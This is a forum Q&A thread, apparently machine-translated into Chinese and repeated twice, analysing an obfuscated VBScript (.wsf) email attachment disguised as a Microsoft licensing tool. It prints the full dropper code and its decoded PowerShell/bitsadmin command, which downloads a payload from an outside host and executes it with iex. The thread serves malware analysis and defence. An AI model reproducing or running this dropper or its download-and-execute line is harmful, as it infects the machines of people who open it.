这个 VB 脚本有潜在危险吗?
Is this VB script potentially dangerous?
今天早上我收到了一个 mal,其中包含一个扩展名为 .wsf 的文件,我无意中点击了它。
我立刻意识到我犯了一个错误......但是为时已晚:(
能告诉我是不是恶意代码吗?
代码如下:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
谢谢!
它混淆自身的事实是一个很好的指标,它可能是恶意的,如果你想看看它试图做什么运行,你可以;
注释掉这一行(如下所示);
'ISUaUv.run KcSOUa,false,-1
在下面添加这一行;
WScript.Echo KcSOUa
当您 运行 脚本时,您将获得此输出;
输出:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
根据第一行判断,该脚本使用 BITSAdmin service(内置于 Windows)启动从远程 URL 下载到存储在您的本地 XLS 文件中用户配置文件 AppData 文件夹。至于第二个,我不清楚它的作用,但具有更多 PowerShell 知识的人将能够阐明它。
更新
它看起来正在使用 gc(Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression 命令)来执行。
下载的 inter.xls 文件可能包含恶意命令,然后在本地系统的上下文中本地执行这些命令。这是绕过远程代码执行的经典脚本小子 hack。
今天早上我收到了一个 mal,其中包含一个扩展名为 .wsf 的文件,我无意中点击了它。
我立刻意识到我犯了一个错误......但是为时已晚:( 能告诉我是不是恶意代码吗?
代码如下:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
谢谢!
它混淆自身的事实是一个很好的指标,它可能是恶意的,如果你想看看它试图做什么运行,你可以;
注释掉这一行(如下所示);
'ISUaUv.run KcSOUa,false,-1
在下面添加这一行;
WScript.Echo KcSOUa
当您 运行 脚本时,您将获得此输出;
输出:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
根据第一行判断,该脚本使用 BITSAdmin service(内置于 Windows)启动从远程 URL 下载到存储在您的本地 XLS 文件中用户配置文件 AppData 文件夹。至于第二个,我不清楚它的作用,但具有更多 PowerShell 知识的人将能够阐明它。
更新
它看起来正在使用 gc(Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression 命令)来执行。
下载的 inter.xls 文件可能包含恶意命令,然后在本地系统的上下文中本地执行这些命令。这是绕过远程代码执行的经典脚本小子 hack。